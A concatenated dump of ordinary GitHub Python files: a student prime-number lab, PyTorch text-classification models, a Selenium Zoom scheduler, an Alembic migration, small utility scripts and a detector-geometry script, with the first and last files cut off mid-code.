previous_num = rotated_num\n if success_count == l-1:\n return True\n return False\n \n # while loop with num for checking all numbers up to n\n #Check if num is a circular Prime\n # If yes, track the number of circular primes in var 'prime'\n # Check if we found nth circular prime (prime == n)\n # Return nth circular prime (num)\n\ndef nthEmirpsPrime(n):\n #non-neg int n \n #returns nth \"Emirp Prime\" ( a prime number which \n #becomes a different prime when decimal digits are reversed\n #13 = true because 31 is a different prime\n \n #check if n is a circular prime\n #check when rotated, if it is different each time\n #return the nearest Emirp Prime\n \n #variables\n n += 1\n numb = 0 #numbers until nth emirp\n emirp = 0 #number of emirps\n \n while emirp < n:\n numb += 1\n print(\"numb:\",numb)\n if isEmirpsPrime(numb):\n emirp += 1\n print(\"emirp:\",emirp)\n \n if emirp == n:\n print (\"numb:\",numb)\n return numb\n #return None\n \n \n\n######################################################################\n# ignore_rest: The autograder will ignore all code below here\n######################################################################\n\n#################################################\n# Test Functions\n#################################################\n\ndef testNumberLength():\n print('Testing numberLength()... ', end='')\n assert(numberLength(12) == 2)\n assert(numberLength(3) == 1)\n assert(numberLength(89) == 2)\n assert(numberLength(12345) == 5)\n assert(numberLength(120021) == 6)\n assert(numberLength(5000) == 4)\n print('Passed!')\n\ndef testCountMatchingDigits():\n print('Testing countMatchingDigits()... ', end='')\n assert(countMatchingDigits(1234, 2071) == 2)\n assert(countMatchingDigits(2203, 1527) == 2)\n assert(countMatchingDigits(5, 1253) == 1)\n assert(countMatchingDigits(18737, 7) == 2)\n assert(countMatchingDigits(1220, 7322) == 4)\n assert(countMatchingDigits(1234, 5678) == 0)\n print('Passed!')\n\ndef testRotateNumber():\n print('Testing rotateNumber()... ', end='')\n assert(rotateNumber(1234) == 4123)\n assert(rotateNumber(4123) == 3412)\n assert(rotateNumber(3412) == 2341)\n assert(rotateNumber(2341) == 1234)\n assert(rotateNumber(5) == 5)\n assert(rotateNumber(111) == 111)\n print('Passed!')\n\ndef testIsCircularPrime():\n print('Testing isCircularPrime()... ', end='')\n assert(isCircularPrime(2) == True)\n assert(isCircularPrime(11) == True)\n assert(isCircularPrime(13) == True)\n assert(isCircularPrime(79) == True)\n assert(isCircularPrime(197) == True)\n assert(isCircularPrime(1193) == True)\n print('Passed!')\n\ndef testNthCircularPrime():\n print('Testing nthCircularPrime()... ', end='')\n assert(nthCircularPrime(0) == 2)\n assert(nthCircularPrime(4) == 11)\n assert(nthCircularPrime(5) == 13)\n assert(nthCircularPrime(11) == 79)\n assert(nthCircularPrime(15) == 197)\n assert(nthCircularPrime(25) == 1193)\n print('Passed!')\n\ndef testNthEmirpsPrime():\n print('Testing nthEmirpsPrime()... ', end='')\n assert(nthEmirpsPrime(0) == 13)\n assert(nthEmirpsPrime(5) == 73)\n assert(nthEmirpsPrime(10) == 149)\n assert(nthEmirpsPrime(20) == 701)\n assert(nthEmirpsPrime(30) == 941)\n print('Passed.')\n\n#################################################\n# testAll and main\n#################################################\n\ndef testAll():\n testNumberLength()\n testCountMatchingDigits()\n testRotateNumber()\n testIsCircularPrime()\n testNthCircularPrime()\n testNthEmirpsPrime()\n\ndef main():\n cs112_f17_week2_linter.lint() # check style rules\n testAll()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Anisha7/Python-Algorithms","sub_path":"lesson2/lab/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15627699156","text":"'''\nFile Defining RNN Architectures and Custom Datasets for RNN and Transformer Models\nVikram Reddy Ardham\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\n\nclass mydataset(Dataset):\n '''\n Pytorch Dataset class to create a a dataloader\n '''\n def __init__(self, x, y):\n super().__init__()\n self.x = torch.tensor(x, dtype=torch.long)\n self.y = torch.tensor(y)\n \n def __len__(self):\n return self.x.size()[0]\n \n def __getitem__(self, ix):\n return self.x[ix], self.y[ix]\n\nclass CustomDataset(Dataset):\n '''\n Custom Dataset that tokenizes input text data for the transformer model\n '''\n def __init__(self, x, y, tokenizer, max_len):\n self.tokenizer = tokenizer\n self.data = x\n self.targets = y\n self.maxlen = max_len\n \n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n inputs = self.tokenizer.encode_plus(self.data[idx], add_special_tokens=True, \n max_length=self.maxlen, pad_to_max_length=True,\n return_token_type_ids=True, truncation=True)\n return {'ids': torch.tensor(inputs['input_ids'], dtype=torch.long),\n 'mask':torch.tensor(inputs['attention_mask'], dtype=torch.long),\n 'token_type_ids':torch.tensor(inputs['token_type_ids'], dtype=torch.long),\n 'targets':torch.tensor(self.targets[idx], dtype=torch.long)}\n\nclass SpatialDropout(nn.Dropout2d):\n '''\n Spatial Dropout for the embedding layer\n Refactor the existing Dropou2d class in PyTorch\n '''\n def forward(self, inps):\n inps =inps.unsqueeze(2)\n inps = inps.permute(0, 3, 2, 1)\n inps = super().forward(inps)\n inps = inps.permute(0, 3, 2, 1)\n inps = inps.squeeze(2)\n return inps\n\nclass myArch(nn.Module):\n '''Basic RNN based Text-classification architecture'''\n def __init__(self, emb_enc, seq_ln, hd_sz, stacks=2, CHOICE='LSTM'):\n super().__init__()\n self.emb = emb_enc\n self.seq_ln = seq_ln\n self.hd_sz = hd_sz\n self.emb_sz = emb_enc.embedding_dim\n self.bidirectional = False\n self.emb_dropout = SpatialDropout(p=0.4)\n \n # Choice of the type of RNN\n ARCH = {'LSTM': nn.LSTM(input_size=self.emb_sz, \n hidden_size=self.hd_sz,\n num_layers =stacks, bias=True, \n bidirectional=self.bidirectional, dropout=0.8,\n batch_first=True), \n 'GRU': SimpleGRU(self.seq_ln, self.emb_sz, self.hd_sz) , \n 'Vanilla RNN': SimpleRNN(self.seq_ln, self.emb_sz, self.hd_sz), }\n \n self.RNN = ARCH[CHOICE]\n \n self.dropout = nn.Dropout(p=0.4)\n Nout = 128\n self.linear = nn.Linear(self.hd_sz*2*(1+int(self.bidirectional)), Nout)\n self.batchnorm = nn.BatchNorm1d(Nout)\n self.out = nn.Linear(Nout, 5)\n\n def forward(self, X):\n '''\n 1. Embedding layer\n 2. Spatial Dropout\n 3. RNN layer\n 4. concatenate (avg_pool, max_pool)\n 5. Linear Layer\n 5. Batch Normalization\n 6. Dropout\n 7. Linear Layer to output class probabilities (5 classes here)\n '''\n h = self.emb(X)\n h = self.emb_dropout(h)\n gru_out, _ = self.RNN(h)\n\n avg_pool = torch.mean(gru_out, 1)\n max_pool, _ = torch.max(gru_out, 1)\n conc = torch.cat((avg_pool, max_pool), 1)\n \n conc = self.batchnorm(nn.ReLU()(self.linear(conc)))\n conc = self.dropout(conc)\n out = self.out(conc)\n \n return out\n\n# My RNN\nclass SimpleRNN(nn.Module):\n '''Vanilla RNN implemented from Scracth '''\n def __init__(self, seq_ln, emb_sz, hd_sz):\n super(SimpleRNN, self).__init__()\n \n self.output_sz = 5\n self.hd_sz = hd_sz\n \n self.h = torch.zeros(1, self.hd_sz)\n self.i2h = nn.Linear(emb_sz, self.hd_sz)\n self.h2h = nn.Linear(hd_sz, hd_sz)\n \n def forward(self, x):\n '''\n 1. Input (embedding) to hidden\n 2. Hidden to hidden\n 3. Add them and apply activation\n '''\n h = self.h\n out = []\n for xi in torch.transpose(x, 0, 1):\n i2h = self.i2h(xi)\n h2h = torch.tanh(i2h + self.h2h(h))\n out.append(h2h)\n return torch.stack(out, dim=1), 1 # Dummpy output as tuple to have a consistent structure with PyTorch\n\n#rnn_loop\ndef rnn_loop(cell, h, x):\n res = []\n for x_ in x.transpose(0,1):\n h = cell(x_, h)\n res.append(h)\n return torch.stack(res, dim=1)\n\n\nclass GRUCell(nn.Module):\n '''Inspired from the fastai-nlp course'''\n def __init__(self, ni, nh):\n super(GRUCell, self).__init__()\n self.ni, self.nh = ni, nh\n self.i2h = nn.Linear(ni, 3*nh)\n self.h2h = nn.Linear(nh, 3*nh)\n \n def forward(self, x, h):\n '''\n return a weighted mean of old and newgates\n weight is the udpategate\n '''\n gate_x = self.i2h(x).squeeze()\n gate_h = self.h2h(h).squeeze()\n i_r,i_u,i_n = gate_x.chunk(3, 1)\n h_r,h_u,h_n = gate_h.chunk(3, 1)\n \n resetgate = torch.sigmoid(i_r + h_r)\n updategate = torch.sigmoid(i_u + h_u)\n newgate = torch.tanh(i_n + (resetgate*h_n))\n return updategate*h + (1-updategate)*newgate\n\n#My GRU \nclass SimpleGRU(nn.Module):\n '''\n Combine the GRUcell with the RNN loop\n '''\n def __init__(self, seq_ln, emb_sz, hd_sz):\n super().__init__()\n self.hd_sz = hd_sz\n self.rnnc = GRUCell(emb_sz, hd_sz)\n \n def forward(self, x):\n h = torch.zeros(1, x.size()[0], self.hd_sz)\n res = rnn_loop(self.rnnc, h, x)\n self.h = res[:, -1].detach()\n res = torch.transpose(torch.squeeze(res), 0, 1)\n return res, 1 # Dummy output 1 \n\nclass BertModel(nn.Module):\n '''Bert Model Class for text-classification \n Adding a dropout layer and linear layer to spit out 5 class probabilities'''\n def __init__(self):\n super().__init__()\n self.model_name = 'bert-base-cased'\n self.l1 = transformers.BertModel.from_pretrained(self.model_name)\n self.l2 = nn.Dropout(0.3)\n self.l3 = nn.Linear(768, 5)\n\n def forward(self, ids, mask, token_type_ids):\n output_1 = self.l1(ids, attention_mask = mask, token_type_ids=token_type_ids)\n output_2 = self.l2(output_1[1])\n output = self.l3(output_2)\n return output\n ","repo_name":"Vikramardham/nlp_text_classification","sub_path":"nlp_models.py","file_name":"nlp_models.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7299020692","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport datetime\nfrom mail_analyzer import bardAnalyzer\nimport pyautogui as pg\nimport pyperclip\nimport pandas as pd\n\n\nclass schedule:\n def __init__(self, driver):\n self.driver = driver\n\n def schedule_zoom_meeting(self, linkReqMails):\n wait = WebDriverWait(self.driver, 300)\n # list\n invitation_link = []\n\n # extract the required details from the mail from bard analyzer\n bardInstance = bardAnalyzer(linkReqMails)\n meeting_details = bardInstance.extract_meeting_details(linkReqMails)\n # print(meeting_details)\n\n for index in range(len(meeting_details)):\n # strat the process of scheduling the meeting\n scheduler_path = \"//ul[@aria-label='meetings']//a[@id='btnScheduleMeeting']\"\n scheduler = wait.until(\n EC.visibility_of_element_located((By.XPATH, scheduler_path))\n )\n scheduler.click()\n\n # define the topic of the meeting\n topic_path = \"//input[@id='topic']\"\n topic = wait.until(\n EC.visibility_of_element_located((By.XPATH, topic_path))\n )\n topic.send_keys(meeting_details['Topic'].iloc[index])\n\n # set the date of the meeting\n date = meeting_details['Date'].iloc[index]\n date = datetime.datetime.strptime(str(date), '%Y-%m-%d')\n\n # extract day month and year\n ex_day = date.day\n ex_month = date.strftime('%B')\n ex_year = date.year\n ex_weekday = date.strftime(\"%A\")\n web_date_format = ex_month + \" \" + str(ex_day) + \" \" + str(ex_year) + \" \" + ex_weekday\n print(web_date_format)\n # set the calendar\n calender = self.driver.find_element(\n By.XPATH, \"//input[@id='mt_time']\")\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", topic)\n calender.click()\n # select the month\n month_sel = wait.until(\n EC.visibility_of_element_located(\n (By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(1)\"))\n )\n cmonth = month_sel.text\n year_sel = wait.until(\n EC.visibility_of_element_located(\n (By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(2)\"))\n )\n cyear = year_sel.text\n # iterate till the year and month are equal\n while True:\n if cmonth == str(ex_month) and cyear == str(ex_year):\n break\n else:\n next = wait.until(\n EC.visibility_of_element_located((By.XPATH, \"//button[contains(@class, 'zm-date-picker__next-month-btn') and contains(@aria-label, 'Next Month')]\"))\n )\n action = ActionChains(self.driver)\n action.move_to_element(next).click().perform()\n cmonth = wait.until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(1)\"))\n ).text\n cyear = wait.until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(2)\"))\n ).text\n # select the date\n table = self.driver.find_element(By.CLASS_NAME, \"zm-date-table\")\n rows = table.find_elements(By.CLASS_NAME, \"zm-date-table__row\")\n for row in rows:\n cells = row.find_elements(By.TAG_NAME, \"td\")\n for cell in cells:\n date_element = cell.find_element(By.TAG_NAME, \"a\")\n date_text = date_element.text\n aria_label = date_element.get_attribute(\"aria-label\")\n if date_text == str(ex_day) and web_date_format in aria_label:\n date_element.click()\n break\n\n # define the start time of the meeting\n start_time_path = \"//div[@class='zm-select mgl-sm start-time zm-select--small']//div[@class='zm-select-input']\"\n start_time = self.driver.find_element(By.XPATH, start_time_path)\n # get the time from the dataframe\n time_string = meeting_details['Time'].iloc[index]\n time_parts = time_string.split()\n if len(time_parts) == 2:\n time = time_parts[0]\n period = time_parts[1]\n # send the time to the start time\n start_time.click()\n pg.typewrite(time)\n pg.press('enter')\n # set the period of the meeting\n period_dropdown_path = \"(//span[@id='start_time2'])[1]\"\n self.driver.find_element(By.XPATH, period_dropdown_path).click()\n if period == 'AM':\n # self.driver.find_element(\n # By.XPATH, \"(//dd[@id='select-item-start_time2-0'])[1]\").click()\n pg.press('enter')\n else:\n # select PM\n # self.driver.find_element(\n # By.XPATH, \"(//dd[@id='select-item-start_time2-1'])[1]\").click()\n pg.press('down')\n pg.press('enter')\n\n # set the time zone\n timezone_india = \"(GMT+5:30) India\"\n timezone_path = '//input[@placeholder=\"select\" and @aria-label=\"select time zone,(GMT-7:00) Pacific Time (US and Canada)\" and @class=\"zm-select-input__inner\"]'\n timezone = self.driver.find_element(By.XPATH, timezone_path)\n timezone.click()\n timezone.send_keys(timezone_india)\n pg.press('enter')\n\n # set the attendees\n attendees_path = \"//input[@placeholder='Enter user names or email addresses']\"\n attendees = self.driver.find_element(By.XPATH, attendees_path)\n attendees_name = meeting_details['Attendees'].iloc[index]\n attendees.click()\n attendees.send_keys(attendees_name)\n pg.sleep(5)\n pg.press('enter')\n\n # save the meeting\n save_path = \"//div[@class='zm-sticky-fixed schedule-bar-sticky']//button[1]\"\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.XPATH, save_path))\n ).click()\n\n # copy the meeting link as invitation\n wait.until(\n EC.visibility_of_element_located(\n (By.XPATH, \"//button[contains(@class, 'zm-button--plain') and contains(@class, 'zm-button--small') and contains(@class, 'zm-button') and span[contains(@class, 'zm-button__slot') and contains(., 'Copy Invitation')]]\"))\n ).click()\n\n # copy to clipboard\n wait.until(\n EC.visibility_of_element_located(\n (By.XPATH, \"//button[contains(@class, 'zm-button--primary') and contains(@class, 'zm-button--small') and contains(@class, 'zm-button') and span[contains(@class, 'zm-button__slot') and contains(., 'Copy Meeting Invitation')]]\"))\n ).click()\n invitation = pyperclip.paste()\n invitation_link.append(invitation)\n self.driver.find_element(By.XPATH, \"//div[@aria-labelledby='customTitle']//span[@class='zm-button__slot'][normalize-space()='Cancel']\").click()\n\n # add the invitation link to the dataframe\n meeting_details['Invitation Link'] = pd.Series(invitation_link).tolist()\n\n return meeting_details\n","repo_name":"uddiGitHub/Automatic-Zoom-Meeting-Scheduler-with-Email-Integration","sub_path":"src/meeting_Scheduler.py","file_name":"meeting_Scheduler.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72582698753","text":"#import itertools\nimport csv\nimport json\n\nnew_data = []\n\nwith open('users.json', 'r') as f:\n users = json.load(f)\n\n for user in users:\n new_user = {'name': user['name'], 'gender': user['gender'],\\\n 'address': user['address'], 'books':[]}\n new_data.append(new_user)\n\nwith open('books.csv') as f:\n books = csv.reader(f)\n header = next(books)\n\n for user, book in zip(new_data, books):\n the_book = {'title': book[header.index('Title')],\\\n 'author': book[header.index('Author')],\\\n 'height': book[header.index('Height')]}\n user['books'].append(the_book)\n\nwith open('new_data.json', 'w') as f:\n json.dump(new_data, f, indent=4)\n\n\n","repo_name":"robert-otus/test_data","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74916866435","text":"\"\"\"Initial structure\n\nRevision ID: c7b49d6f2948\nRevises: \nCreate Date: 2018-06-04 14:56:09.879629\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c7b49d6f2948'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('guild_prefs',\n sa.Column('guild_id', sa.String, primary_key=True),\n sa.Column('prefix', sa.String),\n sa.Column('mute_role', sa.String),\n sa.Column('admin_roles', postgresql.ARRAY(sa.String)),\n sa.Column('mod_roles', postgresql.ARRAY(sa.String)))\n\n op.create_table('delayed_mutes',\n sa.Column('guild_id', sa.String, primary_key=True),\n sa.Column('member_id', sa.String, primary_key=True),\n sa.Column('end_time', sa.DateTime))\n\n op.create_table('warnings',\n sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),\n sa.Column('guild_id', sa.String),\n sa.Column('member_id', sa.String),\n sa.Column('moderator_id', sa.String),\n sa.Column('reason', sa.String, nullable=True),\n sa.Column('timestamp', sa.DateTime),\n sa.Column('cleared_on', sa.DateTime, nullable=True),\n sa.Column('cleared_by', sa.String, nullable=True))\n\n op.create_index('warnings_guild_idx', 'warnings', ['guild_id'])\n op.create_index('warnings_guild_member_idx', 'warnings', ['guild_id', 'member_id'])\n\n\ndef downgrade():\n op.drop_index('warnings_guild_member_idx', 'warnings')\n op.drop_index('warnings_guild_idx', 'warnings')\n op.drop_table('warnings')\n op.drop_table('delayed_mutes')\n op.drop_table('guild_prefs')\n","repo_name":"bryanforbes/Bothanasius","sub_path":"alembic/versions/c7b49d6f2948_initial_structure.py","file_name":"c7b49d6f2948_initial_structure.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31963401977","text":"from time import time\n\nfrom LinkedList.linkedlist import LinkedList\nfrom Set_Map.set_map import Set\n\nclass LinkedListSet(Set):\n\n def __init__(self):\n self._list = LinkedList()\n\n def getSize(self):\n return self._list.get_size()\n\n def isEmpty(self):\n return self.isEmpty()\n\n def contains(self, e):\n return self._list.contains(e)\n\n def add(self, e):\n if self.contains(e):\n return\n self._list.add_first(e)\n\n def remove(self, e):\n self._list.remove(e)\n\n\nif __name__ == '__main__':\n words = \"\"\n with open(\"./ZenofPython\",\"r\") as f:\n words = f.read()\n ##QAQ : 怎么同时以空格和.切割\n words = words.split()\n\n start_time = time()\n list = LinkedListSet()\n for word in words:\n list.add(word)\n\n print('Total words: ', len(words))\n print('Unique words: ', list.getSize())\n print('Contains word \"better\": ', list.contains('better'))\n print(f'Total time: {time() - start_time} seconds')\n","repo_name":"mrmenand/Py_transaction","sub_path":"Algorithms/Python/Set_Map/linkedlist_set.py","file_name":"linkedlist_set.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26625672635","text":"from gtts import gTTS\nfrom googletrans import Translator\nfp = open('e:\\\\0\\\\english_words.txt', mode='r', buffering=-1, encoding=\"utf-8\", errors=None, newline=None, closefd=True, opener=None)\nwords = fp.readlines()\nlanguage = 'en'\nnpp = 0\nfor word in words:\n npp+=1\n if npp<795:\n continue\n word = word.replace('\\n','')\n myobj = gTTS(text=word, lang=language, slow=False)\n myobj.save(f'e:\\\\0\\\\english_words_mp3\\\\{npp}_{word}.mp3')\n translator = Translator()\n result = translator.translate(word, src=language, dest='ru')\n word_rus = result.text;\n myobj = gTTS(text=word_rus, lang='ru', slow=False)\n myobj.save(f'e:\\\\0\\\\english_words_mp3\\\\{npp}_{word}_rus.mp3')\n print (npp)\n\n\n\n","repo_name":"yls1980/Python_projects","sub_path":"python_base/venv_test/english_words_to_mp3.py","file_name":"english_words_to_mp3.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70204064195","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n sub = set()\n l = 0\n res = 0\n for r in range (len(s)):\n while s[r] in sub:\n sub.remove(s[l])\n l += 1\n sub.add(s[r])\n res = max(res, r - l + 1)\n return res","repo_name":"YuqinHu/leetcode","sub_path":"python/5_sliding_window/3_Longest_Substring_Without_Repeating_Characters.py","file_name":"3_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4497595577","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport matplotlib.colors as mcolors\nfrom matplotlib import cm, rc\nimport pandas as pd\nfrom copy import copy, deepcopy\nfrom tqdm import tqdm\n\nfont = {'family' : 'DejaVu Sans',\n# 'weight' : 'bold',\n 'size' : 8 }\n\nrc('font', **font)\nrc('axes', linewidth=0.5)\nrc('lines', lw=0.5)\nrc('axes', axisbelow=False)\nplt.rcParams['xtick.major.size'] = 1.0\nplt.rcParams['xtick.major.width'] = 0.5\nplt.rcParams['xtick.minor.size'] = 1.0\nplt.rcParams['xtick.minor.width'] = 0.5\nplt.rcParams['ytick.major.size'] = 1.0\nplt.rcParams['ytick.major.width'] = 0.5\nplt.rcParams['ytick.minor.size'] = 1.0\nplt.rcParams['ytick.minor.width'] = 0.5\n\nclass Cell:\n\n def __init__(self):\n self.granularity = [256,256,128,-1,64,64,32]\n self.vertices = [[],[],[],[],[],[],[],[]]\n self.vertices_dict = {}\n self.region = 0 #Barrel (2) or endcap (-1,1)\n self.layer = -1\n self.eta_idx = 0\n self.phi_idx = 0\n self.dphi = 0\n\n def RotatePhi(self):\n\n self.dphi = 2*np.pi/self.granularity[self.layer]\n rotated_cell = deepcopy(self)\n rotated_cell.phi_idx = self.phi_idx + 1 #increment phi division\n\n rotated_cell.vertices[0] = rotated_cell.vertices[4][:]\n rotated_cell.vertices[1] = rotated_cell.vertices[5][:]\n rotated_cell.vertices[2] = rotated_cell.vertices[6][:]\n rotated_cell.vertices[3] = rotated_cell.vertices[7][:]\n\n for i,v in enumerate(self.vertices):\n if i<4: \n continue #only shift last 4\n x = v[0]\n y = v[1]\n xp = x*np.cos(self.dphi) - y*np.sin(self.dphi)\n yp = x*np.sin(self.dphi) + y*np.cos(self.dphi)\n rotated_cell.vertices[i][0] = xp\n rotated_cell.vertices[i][1] = yp\n\n rotated_cell = Update(rotated_cell)\n\n return rotated_cell\n\n def MirrorZ(self):\n\n mirrored_cell = deepcopy(self)\n\n mirrored_cell.region = int(-1*mirrored_cell.region)\n\n for i,v in enumerate(self.vertices):\n mirrored_cell.vertices[i] = [self.vertices[i][0], self.vertices[i][1], -1*self.vertices[i][2]]\n\n mirrored_cell = Update(mirrored_cell)\n\n return mirrored_cell\n\n\ndef Update(cell):\n\n cell.vertices_dict = {}\n for i,v in enumerate(cell.vertices):\n cell.vertices_dict['v{}x'.format(i)] = [v[0]]\n cell.vertices_dict['v{}y'.format(i)] = [v[1]]\n cell.vertices_dict['v{}z'.format(i)] = [v[2]]\n cell.vertices_dict['layer'] = cell.layer\n cell.vertices_dict['region'] = cell.region\n cell.vertices_dict['eta_idx'] = cell.eta_idx\n cell.vertices_dict['phi_idx'] = cell.phi_idx\n cell.vertices_dict['hash'] = int(np.sign(cell.region)*int( f'{abs(cell.region)}{cell.layer}{cell.eta_idx}{cell.phi_idx:03}' ))\n\n return cell\n\ndef EtaToTheta( eta ):\n return 2.0 * np.arctan( np.exp( -eta ) )\n\n#--------------------------------------------------\n\n#\n# Assuming that the barrel covers half of the detector eta range\n#\n\nnBins = 128\netaMax = 3.0\netaMaxBarrel = etaMax / 2.0\ndEta = etaMax / nBins\n\nlinewidth = 0.5\n\nlayer_names = [ 'ECAL1', 'ECAL2', 'ECAL3', 'gap', 'HCAL1', 'HCAL2', 'HCAL3' ]\n\nr_all = [ 1500, 1594.11, 1970.56, 2017.62, 2097.62, 2496.17, 3585.57, 4063.84 ] # Fe gap missing\n\nlayer_mergeFactors = [ 1, 1, 2, 1, 4, 4, 8 ]\n\nnLayers = len( r_all ) - 1\n\ntableau_colors = list( mcolors.TABLEAU_COLORS )\ncolors = tableau_colors[:3]\ncolors.append( \"white\" )\ncolors += tableau_colors[3:]\n\n\nnBins_barrel = nBins // 2\nnBins_endcap = nBins_barrel\n\nx_min_border = np.zeros( nBins_barrel )\nx_max_border = np.zeros( nBins_barrel )\ny_low_max_border = np.zeros( nBins_barrel )\ny_high_max_border = np.zeros( nBins_barrel )\n\ncell_idx = 0\ncell_df = pd.DataFrame()\n\n#\n# Endcap\n#\n\nfor iLayer in tqdm(range(nLayers)):\n\n eta_idx = 0\n if iLayer == 3: # Fe gap\n continue\n \n for iCell in tqdm(range(nBins_endcap)):\n \n if iCell % layer_mergeFactors[iLayer] == 0 and iCell>0:\n eta_idx = eta_idx + 1\n\n color = colors[iLayer]\n d = r_all[iLayer + 1] - r_all[iLayer]\n lz = r_all[0] / np.tan( EtaToTheta( etaMaxBarrel ) )\n \n theta_min = EtaToTheta( etaMax - iCell * dEta )\n theta_max = EtaToTheta( etaMax - ( iCell + 1 ) * dEta )\n \n lz += ( r_all[iLayer] - r_all[0] ) * np.cos( theta_min )\n \n y_low_min = lz * np.tan( theta_min )\n y_low_max = lz * np.tan( theta_max )\n \n dz = d * np.cos( theta_min )\n y_high_min = ( lz + dz ) * np.tan( theta_min )\n y_high_max = ( lz + dz ) * np.tan( theta_max )\n\n x_min_border[iCell] = lz\n x_max_border[iCell] = lz + dz\n y_low_max_border[iCell] = y_low_max\n y_high_max_border[iCell] = y_high_max\n\n #Fill cell vertices dataframe\n cell = Cell()\n cell.layer = iLayer\n cell.region = 1\n cell.eta_idx = eta_idx\n cell.phi_idx = 0\n cell.vertices[0] = [0,y_low_min,lz]\n cell.vertices[1] = [0,y_low_max,lz]\n cell.vertices[2] = [0,y_high_min,lz+dz]\n cell.vertices[3] = [0,y_high_max,lz+dz]\n cell.vertices[4] = cell.vertices[0]\n cell.vertices[5] = cell.vertices[1]\n cell.vertices[6] = cell.vertices[2]\n cell.vertices[7] = cell.vertices[3]\n cell.dphi = -1\n cell = Update(cell)\n\n for slice in range(cell.granularity[cell.layer]):\n #if slice > 0: continue HACK!\n rotated_cell = cell.RotatePhi()\n rotated_cell_df_i = pd.DataFrame(rotated_cell.vertices_dict)\n if(len(cell_df)==0):\n cell_df = rotated_cell_df_i\n else:\n cell_df = pd.concat([cell_df,rotated_cell_df_i])\n cell_df = pd.concat([cell_df,pd.DataFrame(rotated_cell.MirrorZ().vertices_dict)])\n cell = rotated_cell\n\n if iCell == 0:\n plt.plot( [lz, lz], [y_low_min, y_low_max] , c = color, lw = linewidth, label = layer_names[iLayer] )\n else:\n plt.plot( [lz, lz], [y_low_min, y_low_max] , c = color, lw = linewidth )\n plt.plot( [lz + dz, lz + dz], [y_high_min, y_high_max], c = color, lw = linewidth )\n\n if iCell > 1:\n plt.plot( [lz, x_min_border[iCell - 1]], [y_low_min, y_low_max_border[iCell - 1]], c = color, lw = linewidth )\n plt.plot( [lz + dz, x_max_border[iCell - 1]], [y_high_min, y_high_max_border[iCell - 1]], c = color, lw = linewidth )\n \n if iCell == nBins_endcap - 1:\n plt.plot( [lz + dz, lz], [y_high_max, y_low_max], c = color, lw = linewidth )\n if iCell % layer_mergeFactors[iLayer] == 0:\n plt.plot( [lz, lz + dz], [y_low_min, y_high_min], c = color, lw = linewidth )\n \n#\n# Barrel\n#\n\nx_low_max_border = np.zeros( nBins_barrel )\nx_high_min_border = np.zeros( nBins_barrel )\nx_high_max_border = np.zeros( nBins_barrel )\ny_high_border = np.zeros( nBins_barrel )\ny_low_border = np.zeros( nBins_barrel )\n\nfor iLayer in tqdm(range(nLayers)):\n \n eta_idx = 0\n\n for iCell in tqdm(range(nBins_barrel)):\n\n if iCell % layer_mergeFactors[iLayer] == 0 and iCell>0:\n eta_idx = eta_idx + 1\n\n color = colors[iLayer]\n r = r_all[iLayer]\n d = r_all[iLayer + 1] - r_all[iLayer]\n \n eta_min = iCell * dEta\n eta_max = eta_min + dEta\n theta_min = EtaToTheta( eta_min )\n theta_max = EtaToTheta( eta_max )\n\n if iLayer == 0:\n \n x_min_low = r / np.tan( theta_min )\n x_max_low = r / np.tan( theta_max )\n y_low = r\n\n else:\n\n if iCell == 0:\n x_min_low = 0.0\n else:\n x_min_low = x_high_min_border[ iCell ]\n x_max_low = x_high_max_border[ iCell ]\n \n y_low = y_high_border[ iCell ] \n \n dy = d * np.sin( theta_min )\n dx_min = d * np.cos( theta_min )\n dx_max = dy / np.tan( theta_max )\n\n# if iLayer == 0:\n# print( x_max_low + dx_max )\n# else:\n# print( x_max_low )\n#\n# print()\n\n x_low_max_border[iCell] = x_max_low\n x_high_min_border[iCell] = x_min_low + dx_min\n x_high_max_border[iCell] = x_max_low + dx_max\n y_low_border[iCell] = y_low\n y_high_border[iCell] = y_low + dy\n \n if iLayer == 3: # Fe gap\n continue\n\n #Fill cell vertices dataframe\n cell = Cell()\n cell.layer = iLayer\n cell.region = 2\n cell.eta_idx = eta_idx\n 